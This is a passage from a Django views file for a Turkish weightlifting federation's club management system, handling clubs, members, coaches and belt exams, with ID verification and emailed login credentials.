petition=club_form.cleaned_data['petition'],\n\n )\n\n communication = communication_form.save(commit=False)\n communication.save()\n clubsave.communication = communication\n\n clubsave.save()\n\n log = str(club_form.cleaned_data['name']) + \" Klup eklendi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n\n\n messages.success(request, 'Kulüp Başarıyla Kayıt Edilmiştir.')\n\n return redirect('sbs:kulupler')\n\n else:\n\n messages.warning(request, 'Alanları Kontrol Ediniz')\n\n return render(request, 
'kulup/kulup-ekle.html',\n {'club_form': club_form, 'communication_form': communication_form})\n\n\n@login_required\ndef return_clubs(request):\n perm = general_methods.control_access_klup(request)\n\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n user = request.user\n clubs = SportsClub.objects.none()\n ClupsSearchForm=ClubSearchForm(request.POST)\n if user.groups.filter(name='KulupUye'):\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser).order_by(\"-pk\")\n\n if request.method == 'POST':\n\n if ClupsSearchForm.is_valid():\n kisi = ClupsSearchForm.cleaned_data.get('kisi')\n city = ClupsSearchForm.cleaned_data.get('city')\n name = ClupsSearchForm.cleaned_data.get('name')\n shortName = ClupsSearchForm.cleaned_data.get('shortName')\n clubMail = ClupsSearchForm.cleaned_data.get('clubMail')\n if not (kisi or city or name or shortName or clubMail):\n if user.groups.filter(name='KulupUye'):\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser).order_by(\"-pk\")\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n clubs = SportsClub.objects.all().order_by(\"-pk\")\n\n else:\n query = Q()\n if city:\n query &= Q(communication__city__name__icontains=city)\n if name:\n query &= Q(name__icontains=name)\n if clubMail:\n query &= Q(clubMail__icontains=clubMail)\n if shortName:\n query &= Q(shortName__icontains=shortName)\n if kisi:\n query &= Q(clubUser=kisi)\n if user.groups.filter(name='KulupUye'):\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser).filter(query)\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n clubs = SportsClub.objects.filter(query)\n\n return render(request, 'kulup/kulupler.html', {'clubs': clubs, 'ClupsSearchForm': ClupsSearchForm, })\n\n\n@login_required\ndef return_add_club_person(request):\n perm = general_methods.control_access(request)\n\n if not 
perm:\n logout(request)\n return redirect('accounts:login')\n user_form = UserForm()\n person_form = PersonForm()\n communication_form = CommunicationForm()\n sportClubUser_form = SportClubUserForm()\n if request.method == 'POST':\n\n user_form = UserForm(request.POST)\n person_form = PersonForm(request.POST, request.FILES)\n communication_form = CommunicationForm(request.POST, request.FILES)\n sportClubUser_form = SportClubUserForm(request.POST)\n\n mail = request.POST.get('email')\n\n if User.objects.filter(email=mail) or ReferenceCoach.objects.exclude(status=ReferenceCoach.DENIED).filter(\n email=mail) or ReferenceReferee.objects.exclude(status=ReferenceReferee.DENIED).filter(\n email=mail) or PreRegistration.objects.exclude(status=PreRegistration.DENIED).filter(\n email=mail):\n messages.warning(request, 'Mail adresi başka bir kullanici tarafından kullanilmaktadir.')\n return render(request, 'kulup/kulup-uyesi-ekle.html',\n {'user_form': user_form, 'person_form': person_form, 'communication_form': communication_form,\n 'sportClubUser_form': sportClubUser_form,\n })\n\n tc = request.POST.get('tc')\n if Person.objects.filter(tc=tc) or ReferenceCoach.objects.exclude(status=ReferenceCoach.DENIED).filter(\n tc=tc) or ReferenceReferee.objects.exclude(status=ReferenceReferee.DENIED).filter(\n tc=tc) or PreRegistration.objects.exclude(status=PreRegistration.DENIED).filter(tc=tc):\n messages.warning(request, 'Tc kimlik numarasi sisteme kayıtlıdır. 
')\n return render(request, 'kulup/kulup-uyesi-ekle.html',\n {'user_form': user_form, 'person_form': person_form, 'communication_form': communication_form,\n 'sportClubUser_form': sportClubUser_form,\n })\n\n name = request.POST.get('first_name')\n surname = request.POST.get('last_name')\n year = request.POST.get('birthDate')\n year = year.split('/')\n\n client = Client('https://tckimlik.nvi.gov.tr/Service/KPSPublic.asmx?WSDL')\n if not (client.service.TCKimlikNoDogrula(tc, name, surname, year[2])):\n messages.warning(request, 'Tc kimlik numarasi ile isim soyisim dogum yılı bilgileri uyuşmamaktadır. ')\n return render(request, 'kulup/kulup-uyesi-ekle.html',\n {'user_form': user_form, 'person_form': person_form, 'communication_form': communication_form,\n 'sportClubUser_form': sportClubUser_form,\n })\n\n if user_form.is_valid() and person_form.is_valid() and communication_form.is_valid() and sportClubUser_form.is_valid():\n user = User()\n user.username = user_form.cleaned_data['email']\n user.first_name = user_form.cleaned_data['first_name']\n user.last_name = user_form.cleaned_data['last_name']\n user.email = user_form.cleaned_data['email']\n group = Group.objects.get(name='KulupUye')\n password = User.objects.make_random_password()\n user.set_password(password)\n user.save()\n user.groups.add(group)\n user.save()\n\n person = person_form.save(commit=False)\n communication = communication_form.save(commit=False)\n person.save()\n communication.save()\n\n club_person = SportClubUser(\n user=user, person=person, communication=communication,\n role=sportClubUser_form.cleaned_data['role'],\n\n )\n\n club_person.save()\n\n subject, from_email, to = 'Halter - Kulüp Üye Bilgi Sistemi Kullanıcı Giriş Bilgileri', 'no-reply@twf.gov.tr', user.email\n text_content = 'Aşağıda ki bilgileri kullanarak sisteme giriş yapabilirsiniz.'\n html_content = '

Site adresi: https://sbs.halter.gov.tr

'\n html_content = html_content + '

Kullanıcı Adı: ' + user.username + '

'\n html_content = html_content + '

Şifre: ' + password + '

'\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n log = str(user.get_full_name()) + \" Klupuyesi eklendi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n\n\n messages.success(request, 'Kulüp Üyesi Başarıyla Kayıt Edilmiştir.')\n\n return redirect('sbs:kulup-uyeleri')\n\n else:\n\n for x in user_form.errors.as_data():\n messages.warning(request, user_form.errors[x][0])\n\n return render(request, 'kulup/kulup-uyesi-ekle.html',\n {'user_form': user_form, 'person_form': person_form, 'communication_form': communication_form,\n 'sportClubUser_form': sportClubUser_form,\n })\n\n\n@login_required\ndef updateClubPersons(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n athlete = SportClubUser.objects.get(pk=pk)\n user = User.objects.get(pk=athlete.user.pk)\n person = Person.objects.get(pk=athlete.person.pk)\n communication = Communication.objects.get(pk=athlete.communication.pk)\n # sportClub = athlete.sportClub\n user_form = UserForm(request.POST or None, instance=user)\n person_form = PersonForm(request.POST or None, request.FILES or None, instance=person)\n communication_form = CommunicationForm(request.POST or None, instance=communication)\n sportClubUser_form = SportClubUserForm(request.POST or None, instance=athlete)\n clubs = SportsClub.objects.filter(clubUser__user=user)\n\n if request.method == 'POST':\n mail = request.POST.get('email')\n if mail != athlete.user.email:\n\n if User.objects.filter(email=mail) or ReferenceCoach.objects.exclude(status=ReferenceCoach.DENIED).filter(\n email=mail) or ReferenceReferee.objects.exclude(status=ReferenceReferee.DENIED).filter(\n email=mail) or PreRegistration.objects.exclude(status=PreRegistration.DENIED).filter(\n email=mail):\n messages.warning(request, 'Mail adresi başka bir kullanici tarafından kullanilmaktadir.')\n return 
render(request, 'kulup/kulup-uyesi-duzenle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'sportClubUser_form': sportClubUser_form, 'clubs': clubs})\n\n tc = request.POST.get('tc')\n if tc != athlete.person.tc:\n if Person.objects.filter(tc=tc) or ReferenceCoach.objects.exclude(status=ReferenceCoach.DENIED).filter(\n tc=tc) or ReferenceReferee.objects.exclude(status=ReferenceReferee.DENIED).filter(\n tc=tc) or PreRegistration.objects.exclude(status=PreRegistration.DENIED).filter(tc=tc):\n messages.warning(request, 'Tc kimlik numarasi sisteme kayıtlıdır. ')\n return render(request, 'kulup/kulup-uyesi-duzenle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'sportClubUser_form': sportClubUser_form, 'clubs': clubs})\n\n name = request.POST.get('first_name')\n surname = request.POST.get('last_name')\n year = request.POST.get('birthDate')\n year = year.split('/')\n\n client = Client('https://tckimlik.nvi.gov.tr/Service/KPSPublic.asmx?WSDL')\n if not (client.service.TCKimlikNoDogrula(tc, name, surname, year[2])):\n messages.warning(request, 'Tc kimlik numarasi ile isim soyisim dogum yılı bilgileri uyuşmamaktadır. 
')\n return render(request, 'kulup/kulup-uyesi-duzenle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'sportClubUser_form': sportClubUser_form, 'clubs': clubs})\n\n if user_form.is_valid() and communication_form.is_valid() and person_form.is_valid() and sportClubUser_form.is_valid():\n\n user = user_form.save(commit=False)\n user.username = user_form.cleaned_data['email']\n user.first_name = user_form.cleaned_data['first_name']\n user.last_name = user_form.cleaned_data['last_name']\n user.email = user_form.cleaned_data['email']\n user.save()\n person_form.save()\n communication_form.save()\n sportClubUser_form.save()\n\n log = str(user.get_full_name()) + \" klup uyesi guncellendi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n\n messages.success(request, 'Kulüp Üyesi Başarıyla Güncellenmiştir.')\n\n # return redirect('sbs:kulup-uyeleri')\n\n else:\n\n for x in user_form.errors.as_data():\n messages.warning(request, user_form.errors[x][0])\n\n return render(request, 'kulup/kulup-uyesi-duzenle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'sportClubUser_form': sportClubUser_form, 'clubs': clubs})\n\n\n@login_required\ndef return_club_coach(request):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n user_form = UserSearchForm()\n user = request.user\n club_user_array = SportClubUser.objects.none()\n coachs = Coach.objects.none()\n if request.method == 'POST':\n user_form = UserSearchForm(request.POST)\n sportsclup = request.POST.get('sportsClub')\n\n if user_form.is_valid():\n firstName = user_form.cleaned_data.get('first_name')\n lastName = user_form.cleaned_data.get('last_name')\n email = user_form.cleaned_data.get('email')\n if not (firstName or lastName or email or sportsclup):\n if user.groups.filter(name='KulupUye'):\n\n clubuser = 
SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n clubsPk = []\n\n for club in clubs:\n coachs |= club.coachs.all().distinct()\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n club_user_array = Coach.objects.all()\n else:\n query = Q()\n if lastName:\n query &= Q(user__last_name__icontains=lastName)\n if firstName:\n query &= Q(user__first_name__icontains=firstName)\n if email:\n query &= Q(user__email__icontains=email)\n if sportsclup:\n query &= Q(sportsclub__name__icontains=sportsclup)\n\n if user.groups.filter(name='KulupUye'):\n\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n for club in clubs:\n coachs |= club.coachs.all().distinct()\n\n coachs = coachs.filter(query).distinct()\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n clubs = SportsClub.objects.all()\n for club in clubs:\n coachs |= club.coachs.all().distinct()\n\n coachs = coachs.filter(query).distinct()\n coachs = Coach.objects.filter(query).distinct()\n\n sportclup = SearchClupForm(request.POST, request.FILES or None)\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n sportclup.fields['sportsClub'].queryset = SportsClub.objects.filter(id__in=clubsPk)\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n sportclup.fields['sportsClub'].queryset = SportsClub.objects.all()\n\n return render(request, 'kulup/kulup-antrenorler.html',\n {'athletes': coachs, 'user_form': user_form, 'Sportclup': sportclup})\n\n\n@login_required\ndef return_rapor_club(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n return render(request, 'kulup/kulupRapor.html')\n\n\n@login_required\ndef return_clup(request):\n # print('ben geldim')\n login_user = 
request.user\n user = User.objects.get(pk=login_user.pk)\n\n # /datatablesten gelen veri kümesi datatables degiskenine alindi\n if request.method == 'GET':\n datatables = request.GET\n print(datatables)\n\n\n elif request.method == 'POST':\n datatables = request.POST\n\n try:\n order = datatables.get('order[0][column]')\n # print('test=', order)\n draw = int(datatables.get('draw'))\n # print(\"draw degeri =\", draw)\n # Ambil start\n start = int(datatables.get('start'))\n # print(\"start degeri =\", start)\n # Ambil length (limit)\n length = int(datatables.get('length'))\n # print(\"lenght degeri =\", length)\n # Ambil data search\n search = datatables.get('search[value]')\n # print(\"search degeri =\", search)\n except:\n draw = 1\n start = 0\n length = 10\n\n if length == -1:\n modeldata = SportsClub.objects.all().order_by('-creationDate')\n total = modeldata.count()\n\n # clüp hepsi\n\n else:\n if search:\n\n modeldata = SportsClub.objects.filter(\n Q(name__icontains=search) | Q(shortName__icontains=search) | Q(clubMail__icontains=search))\n\n total = modeldata.count()\n\n # print(modeldata)\n\n\n else:\n modeldata = SportsClub.objects.all().order_by('-creationDate')[\n start:start + length]\n total = SportsClub.objects.all().count()\n\n say = start + 1\n start = start + length\n page = start / length\n\n beka = []\n\n for item in modeldata:\n athlete = Athlete.objects.filter(licenses__sportsClub=item).count()\n uye = item.clubUser.all().count()\n\n data = {\n 'say': say,\n 'pk': item.pk,\n\n 'name': item.name,\n\n 'uye': uye,\n #\n 'athlete': athlete,\n 'coach': item.coachs.all().count(),\n\n }\n beka.append(data)\n say += 1\n\n order = int(order)\n if order != 0:\n if order == 1:\n beka.sort(key=lambda item: item['name'], reverse=False)\n elif order == 2:\n beka.sort(key=lambda item: item['uye'], reverse=True)\n elif order == 3:\n beka.sort(key=lambda item: item['athlete'], reverse=True)\n elif order == 4:\n beka.sort(key=lambda item: item['coach'], 
reverse=True)\n else:\n beka.sort(key=lambda item: item['say'], reverse=False)\n\n response = {\n\n 'data': beka,\n 'draw': draw,\n 'recordsTotal': total,\n 'recordsFiltered': total,\n\n }\n\n return JsonResponse(response)\n\n\n\n\n\n@login_required\ndef return_club_person(request):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n user_form = UserSearchForm()\n user = request.user\n club_user_array=SportClubUser.objects.none()\n if request.method == 'POST':\n user_form = UserSearchForm(request.POST)\n sportsclup = request.POST.get('sportsClub')\n\n\n\n\n if user_form.is_valid():\n firstName = user_form.cleaned_data.get('first_name')\n lastName = user_form.cleaned_data.get('last_name')\n email = user_form.cleaned_data.get('email')\n if not (firstName or lastName or email or sportsclup):\n club_user_array = []\n if user.groups.filter(name='KulupUye'):\n\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n\n club_user_array = SportClubUser.objects.filter(sportsclub__in=clubsPk).distinct()\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n club_user_array = SportClubUser.objects.all()\n else:\n query = Q()\n if lastName:\n query &= Q(user__last_name__icontains=lastName)\n if firstName:\n query &= Q(user__first_name__icontains=firstName)\n if email:\n query &= Q(user__email__icontains=email)\n if sportsclup:\n query &=Q(sportsclub__name__icontains=sportsclup)\n\n club_user_array = []\n if user.groups.filter(name='KulupUye'):\n\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n\n club_user_array = SportClubUser.objects.filter(sportsclub__in=clubsPk).filter(query).distinct()\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n 
club_user_array = SportClubUser.objects.filter(query).distinct()\n\n sportclup = SearchClupForm(request.POST, request.FILES or None)\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n sportclup.fields['sportsClub'].queryset = SportsClub.objects.filter(id__in=clubsPk)\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n sportclup.fields['sportsClub'].queryset = SportsClub.objects.all()\n\n return render(request, 'kulup/kulup-uyeleri.html', {'athletes': club_user_array, 'user_form': user_form,'Sportclup':sportclup})\n\n\n@login_required\ndef return_club_role(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n club_role_form = ClubRoleForm()\n\n if request.method == 'POST':\n\n club_role_form = ClubRoleForm(request.POST)\n\n if club_role_form.is_valid():\n\n clubrole = ClubRole(name=club_role_form.cleaned_data['name'])\n clubrole.save()\n messages.success(request, 'Kulüp Üye Rolü Başarıyla Kayıt Edilmiştir.')\n return redirect('sbs:kulup-uye-rolu')\n\n else:\n\n messages.warning(request, 'Alanları Kontrol Ediniz')\n club_role = ClubRole.objects.all()\n return render(request, 'kulup/kulup-uye-rolu.html',\n {'club_role_form': club_role_form, 'club_role': club_role})\n\n\n@login_required\ndef deleteClubRole(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = ClubRole.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n except ClubRole.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid 
request'})\n\n\n@login_required\ndef deleteClubUser(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportClubUser.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'delete successfully'})\n except ClubRole.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef deleteClubUserFromClub(request, pk, club_pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportClubUser.objects.get(pk=pk)\n club = SportsClub.objects.get(pk=club_pk)\n\n club.clubUser.remove(obj)\n\n log = str(club) + \" Klup üyesi cikarildi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n club.save()\n\n return JsonResponse({'status': 'Success', 'messages': 'delete successfully'})\n except ClubRole.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef deleteCoachFromClub(request, pk, club_pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = Coach.objects.get(pk=pk)\n club = SportsClub.objects.get(pk=club_pk)\n\n club.coachs.remove(obj)\n\n log = str(club) + \" Klup antrenör cikarildi\"\n log = general_methods.logwrite(request, request.user, log)\n club.save()\n\n return JsonResponse({'status': 'Success', 'messages': 'delete successfully'})\n except ClubRole.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not 
exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef updateClubRole(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n clubrole = ClubRole.objects.get(id=pk)\n clubrole_form = ClubRoleForm(request.POST or None, instance=clubrole)\n\n if request.method == 'POST':\n if clubrole_form.is_valid():\n clubrole_form.save()\n messages.success(request, 'Başarıyla Güncellendi')\n return redirect('sbs:kulup-uye-rolu')\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz')\n\n return render(request, 'kulup/kulupRolDuzenle.html',\n {'clubrole_form': clubrole_form})\n\n\n@login_required\ndef clubDelete(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportsClub.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n except SportsClub.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef clubUpdate(request, pk):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n club = SportsClub.objects.get(id=pk)\n\n if request.user.groups.filter(name='KulupUye'):\n if not (club.clubUser.filter(user=request.user)):\n return redirect('sbs:kulupler')\n\n athletes = Athlete.objects.filter(licenses__sportsClub=club)\n\n\n try:\n com_id = club.communication.pk\n communication = Communication.objects.get(id=com_id)\n communication_form = CommunicationForm(request.POST or None, instance=communication)\n except:\n communication_form = CommunicationForm(request.POST or None)\n\n club_form = ClubForm(request.POST or None, 
request.FILES or None, instance=club)\n clubPersons = club.clubUser.all()\n clubCoachs = club.coachs.all()\n if request.method == 'POST':\n if club_form.is_valid():\n club_form.save()\n\n if not club.communication:\n communication = communication_form.save(commit=False)\n communication.save()\n club.communication=communication\n club.save()\n\n\n else:\n communication_form.save()\n\n log = str(club) + \" Klup güncellendi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n messages.success(request, 'Başarıyla Güncellendi')\n return redirect('sbs:update-club', club.pk)\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz')\n\n return render(request, 'kulup/kulupDuzenle.html',\n {'club_form': club_form, 'communication_form': communication_form, 'clubPersons': clubPersons,\n 'athletes': athletes,\n 'club': club, 'clubCoachs': clubCoachs})\n\n\n@login_required\ndef choose_coach(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n coaches = Coach.objects.all()\n user_form = UserSearchForm()\n if request.method == 'POST':\n\n if user_form.is_valid():\n firstName = user_form.cleaned_data.get('first_name')\n lastName = user_form.cleaned_data.get('last_name')\n email = user_form.cleaned_data.get('email')\n if not (firstName or lastName or email):\n messages.warning(request, 'Lütfen Arama Kriteri Giriniz.')\n else:\n query = Q()\n if lastName:\n query &= Q(user__last_name__icontains=lastName)\n if firstName:\n query &= Q(user__first_name__icontains=firstName)\n if email:\n query &= Q(user__email__icontains=email)\n coaches = Coach.objects.filter(query)\n user_form = UserSearchForm(request.POST)\n athletes1 = request.POST.getlist('selected_options')\n if athletes1:\n students = [int(x) for x in athletes1]\n instances = Coach.objects.filter(id__in=students)\n club = SportsClub.objects.get(pk=pk)\n for coach in instances:\n club.coachs.add(coach)\n club.save()\n 
messages.success(request, 'Antrenör Başarıyla Eklenmiştir.')\n\n return redirect('sbs:update-club', pk=pk)\n\n return render(request, 'antrenor/antrenorsec.html', {'coaches': coaches, 'user_form': user_form})\n\n\n@login_required\ndef choose_sport_club_user(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n sportClubUsers = SportClubUser.objects.all()\n user_form = UserSearchForm()\n if request.method == 'POST':\n user_form = UserSearchForm(request.POST)\n athletes1 = request.POST.getlist('selected_options')\n if user_form.is_valid():\n firstName = user_form.cleaned_data.get('first_name')\n lastName = user_form.cleaned_data.get('last_name')\n email = user_form.cleaned_data.get('email')\n if not (firstName or lastName or email):\n print('')\n # messages.warning(request, 'Lütfen Arama Kriteri Giriniz.')\n else:\n query = Q()\n if lastName:\n query &= Q(user__last_name__icontains=lastName)\n if firstName:\n query &= Q(user__first_name__icontains=firstName)\n if email:\n query &= Q(user__email__icontains=email)\n sportClubUsers = SportClubUser.objects.filter(query)\n if athletes1:\n students = [int(x) for x in athletes1]\n instances = SportClubUser.objects.filter(id__in=students)\n\n club = SportsClub.objects.get(pk=pk)\n for club_user in instances:\n club.clubUser.add(club_user)\n club.save()\n\n log = str(club) + \" Klup uyesi ekledi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n\n\n\n messages.success(request, 'Kulüp Üyesi Başarıyla Eklenmiştir.')\n\n return redirect('sbs:update-club', pk=pk)\n\n return render(request, 'kulup/kulupuyesisec.html', {'coaches': sportClubUsers, 'user_form': user_form})\n\n\n@login_required\ndef return_belt_exams(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n user = request.user\n\n if user.groups.filter(name='KulupUye'):\n\n clubuser = 
SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n\n exams = BeltExam.objects.filter(sportClub__in=clubsPk)\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n exams = BeltExam.objects.all()\n\n return render(request, 'kulup/kusak-sinavlari.html', {'exams': exams})\n\n\ndef detail_belt_exam(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n exam = BeltExam.objects.get(pk=pk)\n return render(request, 'kulup/kusak-sinavi-incele.html', {'exam': exam})\n\n\n@login_required\ndef approve_belt_exam(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n exam = BeltExam.objects.get(pk=pk)\n # her onaya geldiginde kuşaklari bir üst seviyeye göndermesini engelledik.\n if exam.status!=BeltExam.APPROVED:\n athletes = exam.athletes.all()\n for athlete in athletes:\n level = Level()\n # level.startDate = exam.examDate\n # level.levelType = EnumFields.LEVELTYPE.BELT\n # lastLevel = athlete.belts.last()\n # lastDefinition = lastLevel.definition\n # level.definition = lastDefinition.parent\n # level.status = Level.APPROVED\n # level.save()\n # athlete.belts.add(level)\n # athlete.save()\n\n\n\n exam.status = BeltExam.APPROVED\n exam.save()\n messages.success(request, 'Sınav Onaylanmıştır.')\n return redirect('sbs:kusak-sinavi-incele', pk=pk)\n\n\ndef denied_belt_exam(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n exam = BeltExam.objects.get(pk=pk)\n exam.status = exam.DENIED\n exam.save()\n return redirect('sbs:kusak-sinavi-incele', pk=pk)\n\n\n# sporcu seç\n@login_required\ndef choose_athlete(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return 
redirect('accounts:login')\n login_user = request.user\n user = User.objects.get(pk=login_user.pk)\n sinav = BeltExam.objects.get(pk=pk)\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubsPk = []\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n for club in clubs:\n clubsPk.append(club.pk)\n exam_athlete = []\n for item in sinav.athletes.all():\n exam_athlete.append(item.user.pk)\n athletes = Athlete.objects.filter(licenses__sportsClub__in=clubsPk).exclude(belts=None).exclude(licenses=None).exclude(beltexam__athletes__user__in = exam_athlete).filter(licenses__branch=sinav.branch,licenses__status='Onaylandı').filter(belts__branch=sinav.branch,belts__status='Onaylandı').distinct()\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n exam_athlete=[]\n for item in sinav.athletes.all():\n exam_athlete.append(item.user.pk)\n # print(sinav.branch)\n athletes=Athlete.objects.exclude(belts=None).exclude(licenses=None).exclude(beltexam__athletes__user__in = exam_athlete).filter(licenses__branch=sinav.branch,licenses__status='Onaylandı').filter(belts__branch=sinav.branch,belts__status='Onaylandı')\n # .exclude(belts__definition__parent_id=None) eklenmeli ama eklendigi zaman kuşaklarindan bir tanesi en üst olunca almıyor\n if request.method == 'POST':\n\n athletes1 = request.POST.getlist('selected_options')\n if athletes1:\n for x in athletes1:\n sinav.athletes.add(x)\n return redirect('sbs:kusak-sinavi-incele', pk=pk)\n return render(request, 'kulup/kusak-sınavı-antroner-sec.html', {'athletes': athletes})\n\n\n@login_required\ndef choose_coach_clup(request, pk):\n perm = general_methods.control_access(request)\n if not perm:\n logout(request)\n return redirect('accounts:login')\n login_user = request.user\n user = User.objects.get(pk=login_user.pk)\n clup = SportsClub.objects.get(pk=pk)\n\n coachsPk = []\n for coach in clup.coachs.all():\n coachsPk.append(coach.pk)\n athletes = 
Coach.objects.exclude(id__in=coachsPk)\n\n # license.athlete_set.first\n\n if request.method == 'POST':\n coach = request.POST.getlist('selected_options')\n if coach:\n for coa in coach:\n clup.coachs.add(Coach.objects.get(pk=coa))\n clup.save()\n\n log = str(clup) + \" Klup antrenor ekledi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n return redirect('sbs:update-club', pk=pk)\n return render(request, 'antrenor/Antrenor-sec.html', {'athletes': athletes})\n\n\n\n\n\n\n\n\n\n\n@login_required\ndef choose_coach(request, pk):\n perm = general_methods.control_access(request)\n if not perm:\n logout(request)\n return redirect('accounts:login')\n login_user = request.user\n user = User.objects.get(pk=login_user.pk)\n sinav = BeltExam.objects.get(pk=pk)\n athletes = Coach.objects.none()\n # .filter(grades__branch=sinav.branch) eklenmeli\n coa=[]\n for item in sinav.coachs.all():\n coa.append(item.user.pk)\n athletes = Coach.objects.filter(grades__branch=sinav.branch,grades__status='Onaylandı').exclude(beltexam__coachs__user_id__in=coa).filter(visa__startDate__year=timezone.now().year).exclude(grades=None).exclude(visa=None).exclude(grades__definition__name='1.Kademe').exclude(grades__definition=None).distinct()\n # for fd in coach:\n # for visa in fd.visa.all():\n # if(date(sinav.examDate.year,sinav.examDate.month,sinav.examDate.day)-date(visa.creationDate.year,visa.creationDate.month,visa.creationDate.day)).days<365:\n # athletes|=Coach.objects.filter(pk=fd.pk).distinct()\n\n if request.method == 'POST':\n athletes1 = request.POST.getlist('selected_options')\n if athletes1:\n for x in athletes1:\n if not sinav.coachs.all().filter(beltexam__coachs__user_id=x):\n 